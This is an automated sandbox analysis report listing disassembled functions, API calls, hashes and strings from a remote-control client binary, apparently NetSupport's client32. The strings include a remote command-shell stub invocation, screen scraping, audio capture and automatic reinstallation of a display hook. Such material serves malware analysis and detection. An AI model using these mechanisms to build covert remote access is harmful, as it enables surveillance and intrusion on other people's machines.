                                                                                                                                                                                                    Function 110F5300 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • SetCursor.USER32(00000000,?,00000000), ref: 110F53CB
                                                                                                                                                                                                    • ShowCursor.USER32(00000000), ref: 110F53D8
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F53E9
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5413
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5432
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F5443
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F544C
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5460
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110F5473
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F548B
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F549E
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F54A7
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F54BA
                                                                                                                                                                                                    • ShowCursor.USER32(00000001), ref: 110F54C2
                                                                                                                                                                                                    • SetCursor.USER32(?), ref: 110F54CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
                                                                                                                                                                                                    • String ID: NSLockExit
                                                                                                                                                                                                    • API String ID: 2358329513-1578567420
                                                                                                                                                                                                    • Opcode ID: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
                                                                                                                                                                                                    • Instruction ID: da66d542c3fb9b9b9736b56b4e9605354d9b8fdeed183c23e7030b173a746b46
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451AC75E0032AABDB11DFA48C81FEDF7B8EB44718F1085A5E615E7184EB71AA40CF91
                                                                                                                                                                                                    Function 110275D0 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 139processCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                      • Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
                                                                                                                                                                                                      • Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                      • Part of subcall function 110EAED0: RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,24DE4E77), ref: 110EAEEC
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000043), ref: 110276A4
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110276CB
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110276F5
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11027730
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 11027785
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102779C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110277A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CloseCreateFile$FolderModuleOpenPathProcess_memsetwsprintf$AddressCurrentMetricsNameProcSystemVersion__wcstoi64_strncpy
                                                                                                                                                                                                    • String ID: /Q /Q$"%sWINST32.EXE"$"%sWINSTALL.EXE"$AutoInstallGdihook5$Client$D$System\CurrentControlSet\Services\Gdihook5$Trying to reinstall gdihook5$screenscrape
                                                                                                                                                                                                    • API String ID: 1724249554-531500863
                                                                                                                                                                                                    • Opcode ID: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
                                                                                                                                                                                                    • Instruction ID: d2b55fc42617096dc1e54143e0f6b596911c59ff24b6e1298e75f3af09eb386e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41FA74E4062AAAEB50DBA0CC85FEDF7B8AB14708F1041D5E929B72C0EB70B544CB54
                                                                                                                                                                                                    Function 11059490 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 147COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 110594C3
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,74DF2EF0,74DF2EE0,74E02D70), ref: 11059504
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059516
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059520
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 1105952C
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11059536
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059542
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1105954C
                                                                                                                                                                                                    • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11059558
                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000000), ref: 11059560
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1105958D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11059639
                                                                                                                                                                                                      • Part of subcall function 1108BC20: _memset.LIBCMT ref: 1108BC89
                                                                                                                                                                                                      • Part of subcall function 1108BC20: GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCA2
                                                                                                                                                                                                      • Part of subcall function 1108BC20: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,?,?,110EAA59,0000070B), ref: 1108BCD4
                                                                                                                                                                                                      • Part of subcall function 1108BC20: CloseHandle.KERNEL32(00000000), ref: 1108BD0C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$EventInformation$Create$Close_memset$ResetTokenVersionwsprintf
                                                                                                                                                                                                    • String ID: CloseHandle_1$D$remcmdstub.exe %u %u %u %u %%COMSPEC%%
                                                                                                                                                                                                    • API String ID: 3301782102-1870880251
                                                                                                                                                                                                    • Opcode ID: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
                                                                                                                                                                                                    • Instruction ID: 9498dede17ae523b820893f7966d078463fb7189cb60d919b27b44eccd4d473b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99f25927b6cb76179c42b9a4f734931d8e8205977da96904174c65bee3cf05ba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8516675A41328ABEB51CF98CC85FEAB7B9EB48B04F004099F718E72C4E6B16940CF55
                                                                                                                                                                                                    Function 11121100 Relevance: 24.8, APIs: 4, Strings: 10, Instructions: 270threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 111211B5
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
                                                                                                                                                                                                    • String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
                                                                                                                                                                                                    • API String ID: 3042533059-2538903574
                                                                                                                                                                                                    • Opcode ID: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
                                                                                                                                                                                                    • Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51
                                                                                                                                                                                                    Function 11041550 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202processCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110416EC
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1104171E
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11041769
                                                                                                                                                                                                    • _memset.LIBCMT ref: 11041776
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 110417AE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110417C5
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110417CE
                                                                                                                                                                                                      • Part of subcall function 11094E70: LoadLibraryA.KERNEL32(USER32,?,?,110077D5), ref: 11094E79
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 11094E8D
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 11094E9A
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11094EA7
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11094EB4
                                                                                                                                                                                                      • Part of subcall function 11094E70: _memset.LIBCMT ref: 11094EC4
                                                                                                                                                                                                      • Part of subcall function 11094DC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 11094DDD
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                      • Part of subcall function 11015410: GlobalAddAtomA.KERNEL32(NSMIdentifyWnd), ref: 11015426
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProcwsprintf$_memset$CloseHandle$AtomCreateGlobalInfoLibraryLoadParametersProcessSystem
                                                                                                                                                                                                    • String ID: %s %s$%sPlaySound.exe$%sSounds\%s$D$RandomSelect$StudentPicked.wav$StudentSelected.wav
                                                                                                                                                                                                    • API String ID: 2679228845-3892444432
                                                                                                                                                                                                    • Opcode ID: b3725c502d2789fe40fbb26aadf6588f8ed80d9f12081c1d57b9f8c917426c69
                                                                                                                                                                                                    • Instruction ID: 9c2d6cc32ef246ace46494575b6d7f0e632273de9197a299b6468622a4a2010b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3725c502d2789fe40fbb26aadf6588f8ed80d9f12081c1d57b9f8c917426c69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A7187B5E4021E6BEB15DB50DC81FDEB7B8AB04718F1041D9E619A71C0EA70BB44CFA5
                                                                                                                                                                                                    Function 1100B330 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 190fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,Audio,DisableSounds,00000000,00000000,24DE4E77), ref: 1100B3BB
                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B3D8
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 1100B409
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B42F
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B469
                                                                                                                                                                                                      • Part of subcall function 1100AC60: EnterCriticalSection.KERNEL32(?,24DE4E77), ref: 1100ACA4
                                                                                                                                                                                                      • Part of subcall function 1100AC60: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACC2
                                                                                                                                                                                                      • Part of subcall function 1100AC60: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AD0E
                                                                                                                                                                                                      • Part of subcall function 1100AC60: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD55
                                                                                                                                                                                                      • Part of subcall function 1100AC60: CloseHandle.KERNEL32(00000000), ref: 1100AD5C
                                                                                                                                                                                                      • Part of subcall function 1100AC60: _free.LIBCMT ref: 1100AD73
                                                                                                                                                                                                      • Part of subcall function 1100AC60: FreeLibrary.KERNEL32(?), ref: 1100AD8B
                                                                                                                                                                                                      • Part of subcall function 1100AC60: LeaveCriticalSection.KERNEL32(?), ref: 1100AD95
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B48E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B513
                                                                                                                                                                                                    • \\.\NSAudioFilter, xrefs: 1100B3D0
                                                                                                                                                                                                    • DisableSounds, xrefs: 1100B362
                                                                                                                                                                                                    • Audio, xrefs: 1100B367
                                                                                                                                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B53C
                                                                                                                                                                                                    • InitCaptureSounds NT6, xrefs: 1100B4AE
                                                                                                                                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4E3
                                                                                                                                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B4F3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
